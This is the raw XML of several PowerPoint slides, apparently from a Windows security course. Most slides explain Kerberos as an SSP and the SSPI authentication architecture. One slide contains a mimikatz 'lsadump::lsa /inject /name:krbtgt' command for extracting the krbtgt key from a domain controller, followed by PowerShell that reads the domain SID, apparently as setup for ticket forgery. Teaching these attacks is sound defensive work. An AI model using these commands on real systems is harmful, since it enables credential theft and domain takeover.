                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
                <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>klist</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              <a:sym typeface="Lucida Sans Typewriter" pitchFamily="49"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129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1046767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000" dirty="0"/>
              <a:t>Implemented as Kerberos.dll - loaded by LSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Plugs into Security Support Provider Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Applications can specify Kerberos as SSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Negotiate selects suitable SSP based on provided information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Kerberos SSP Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Windows Server 2003 implements the Kerberos V5 authentication protocol as a Security Support Provider (SSP), a dynamic-link library (DLL) supplied with the operating system. Windows Server 2003 includes an SSP for NTLM authentication as well. By default, both SSPs are loaded by the Local Security Authority (LSA) on a Windows Server 2003 computer when the system boots. The system can use either SSP to authenticate network logons and client/server connections. Which SSP is used depends on the capabilities of the computer on the other side of the connection and the preferences of the individual application that is being used.</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Microsoft SSPI is the foundation for authentication in Windows Server 2003. That is, applications and infrastructure services that require authentication use SSPI to provide it.</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SSPI is the implementation of the Generic Security Service API (GSSAPI) in Windows Server 2003. For more information about GSSAPI, see RFC 2743 and RFC 2744 in the IETF RFC Database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="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effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The default SSPs in Windows Server 2003—Negotiate (SPNEGO), Kerberos, NTLM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Schannel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, and Digest authentication protocols—are plugged into the SSPI in the form of DLLs. Additional SSPs can be plugged in if they can interoperate with the SSPI. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The SSPI in Windows Server 2003 provides a mechanism that carries authentication tokens over the existing communication channel between the client and server. When two parties need to be authenticated so that they can communicate securely, the requests for authentication are routed to the SSPI, which completes the authentication process, regardless of the network protocol currently in use. The SSPI returns transparent binary large objects, which are then passed to the other side of the connection by the application, at which point they can be passed to the SSPI layer on that side. Thus, the SSPI enables an application to use various security models available on a computer or network without changing the interface to the security system.</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following table describes the SSP components that are plugged into the SSPI. Each of the protocols in the table is used in different ways in Windows Server 2003 to promote secure communication in an insecure network environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Kerberos V5 authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An industry-standard protocol that is used with either a password or a smart card for interactive logon. It is also the preferred authentication method for services in Windows 2000 and Windows Server 2003.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NTLM authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A challenge-response protocol that is used to provide compatibility with versions of Windows earlier than Windows 2000.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Digest authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An industry standard that is used in Windows Server 2003 for Lightweight Directory Access Protocol (LDAP) and Web authentication. Digest transmits credentials across the network as an MD5 hash or message digest.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Schannel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An SSP that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) Internet standard authentication protocols. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Schannel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is used for Web-based server authentication such as when a user attempts to access a secure Web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Negotiate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An SSP that can be used to negotiate a specific authentication protocol. When an application calls into SSPI to log on to a network, it can specify an SSP to process the request. If the application specifies Negotiate, Negotiate analyzes the request and picks the best SSP to handle the request based on customer-configured security policy.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415641093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fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006400"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Run one of these commands on the DC to get the keys</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r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006400"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># .\mimikatz.exe "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="006400"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lsadump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006400"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="006400"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006400"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /inject /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="006400"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name:krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006400"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" exit</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r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006400"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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domainName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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'a'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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domainFqdn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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'a.vm.net'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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'install'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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domainContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>New-Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8A2BE2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.DirectoryServices.ActiveDirectory.DirectoryContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Domain'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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domainFqdn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF4500"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.DirectoryServices.ActiveDirectory.Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>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domainContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetDirectoryEntry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>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domainSid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[]]</a:t>
            </a:r>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domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objectSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Value</a:t>
            </a:r>
          </a:p>
          <a:p>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domainSid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A9A9A9"/>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0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>New-Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8A2BE2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
